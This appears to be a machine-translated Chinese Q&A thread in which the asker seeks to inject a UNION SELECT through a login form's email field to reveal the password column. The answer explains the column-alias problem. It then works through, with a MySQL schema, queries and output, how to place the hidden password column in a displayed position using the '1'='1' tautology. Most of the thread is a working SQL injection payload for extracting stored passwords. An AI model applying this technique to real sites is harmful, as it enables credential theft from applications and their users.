我进行了此sql查询,以便返回其他名称的密码列。
SELECT * FROM
login
where email = '1' or '1' = '1'
union
select password as foo, null as col, null as col,
null as col, null as col, null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col
from login
此查询不返回任何foo列。 有什么问题吗?
编辑: 我想通过电子邮件注入一张桌子。我想将密码打印为“ foo”,替换(发布)“从登录名中选择*,其中email = $ POST”
答案 0 :(得分:0)
这是因为您正在做SELECT * ... UNION,无法在联合中重新定义别名。
模式(MySQL v5.7)
create table test
(
id int,
datas varchar(255)
);
INSERT INTO test VALUES (1, "foo"), (2, "bar");
查询#1
SELECT *
FROM test
UNION
SELECT id AS toto, -- toto alias won't be used, the col name was defined in select *
NULL AS lol -- same than above
FROM test;
输出检查字段名称
| id | datas |
| --- | ----- |
| 1 | foo |
| 2 | bar |
| 1 | |
| 2 | |
由于无法在UNION中重命名列,因此您仍然可以猜测列的顺序,并尝试在正确的位置获取数据(在显示的位置获取秘密数据)
模式(MySQL v5.7)
create table test
(
id int,
DisplayedDatas varchar(255),
SecretDatas varchar(255)
);
INSERT INTO test VALUES (1, "foo", "password1"), (2, "bar", "password2");
查询#1
SELECT *
FROM test
WHERE DisplayedDatas = '1' or '1' = '1'
UNION
SELECT NULL, SecretDatas, NULL
FROM test;
输出
| id | DisplayedDatas | SecretDatas |
| --- | -------------- | ----------- |
| 1 | foo | password1 |
| 2 | bar | password2 |
| | password1 | |
| | password2 | |